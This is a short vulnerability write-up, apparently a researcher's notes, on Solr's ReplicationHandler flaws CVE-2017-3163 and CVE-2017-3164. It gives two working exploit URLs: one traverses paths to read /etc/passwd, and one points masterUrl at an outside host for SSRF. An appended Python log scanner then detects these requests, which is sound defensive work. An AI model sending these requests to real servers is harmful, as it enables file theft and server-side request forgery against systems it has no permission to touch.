https://xz.aliyun.com/t/8374
Solr's ReplicationHandler class handles its input data improperly, which leads to an arbitrary file read and a server-side request forgery vulnerability; the assigned identifiers are CVE-2017-3163 and CVE-2017-3164.
A few observations:
1. The ant build is painfully slow, even through a proxy; most of the time is spent not on downloading but on dependency resolution.
2. Command for attaching the IDEA debugger:
./solr start -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=6666" -p 8983 -s "/Users/rai4over/Desktop/solr-6.0.0/solr/example/example-DIH/solr"
3. After stepping through the program, the early part is too verbose; it is enough to break at the point where the command is parsed and follow the different functions from there.
Exploit requests
File read
http://127.0.0.1:8983/solr/db/replication?command=filecontent&file=../../../../../../../../../../../../../etc/passwd&wt=filestream&generation=1
SSRF
http://127.0.0.1:8983/solr/db/replication?command=fetchindex&masterUrl=http://f422cd57.y7z.xyz/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb
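The two requests above leave distinctive traces in the HTTP access log. As an added example (not from the original post), the following Python scans constructed sample log lines for a ReplicationHandler `filecontent` command whose `file=` parameter traverses out of the index directory, and for a `fetchindex` command whose `masterUrl` points at a host outside an assumed allow-list of replication masters; the log format, the host names and the `TRUSTED_MASTERS` set are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post); the
# request paths mirror the two ReplicationHandler requests shown above.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2020:10:00:00 +0000] "GET /solr/db/select?q=*:*&wt=json HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /solr/db/replication?command=filecontent&file=../../../../etc/passwd&wt=filestream&generation=1 HTTP/1.1" 200 1234
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /solr/db/replication?command=fetchindex&masterUrl=http://attacker.example/xxxx&wt=json HTTP/1.1" 200 60
192.168.1.2 - - [01/Jan/2020:10:00:03 +0000] "GET /solr/db/replication?command=fetchindex&masterUrl=http://solr-master.internal:8983/solr/db HTTP/1.1" 200 60
"""

# Hosts that are legitimately allowed as replication masters (assumed).
TRUSTED_MASTERS = {"solr-master.internal"}

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_request(path: str):
    """Return a finding label for one request path, or None if it looks benign."""
    parts = urlsplit(path)
    if not parts.path.endswith("/replication"):
        return None
    qs = parse_qs(parts.query)  # also decodes percent-encoded traversal such as %2e%2e
    command = qs.get("command", [""])[0].lower()
    if command == "filecontent":
        # CVE-2017-3163: 'file' is resolved relative to the index directory,
        # so any '..' segment or absolute path escapes it.
        for f in qs.get("file", []):
            if ".." in f.replace("\\", "/").split("/") or f.startswith("/"):
                return "CVE-2017-3163 path traversal in file="
    if command == "fetchindex":
        # CVE-2017-3164: masterUrl is fetched server-side; a host outside the
        # allow-list is an SSRF attempt rather than normal replication.
        for url in qs.get("masterUrl", []):
            host = urlsplit(url).hostname or ""
            if host not in TRUSTED_MASTERS:
                return f"CVE-2017-3164 untrusted masterUrl host {host}"
    return None


def scan_log(text: str):
    """Return (client_ip, finding) pairs for every suspicious line in the log."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m:
            label = classify_request(m.group(1))
            if label:
                findings.append((line.split()[0], label))
    return findings
```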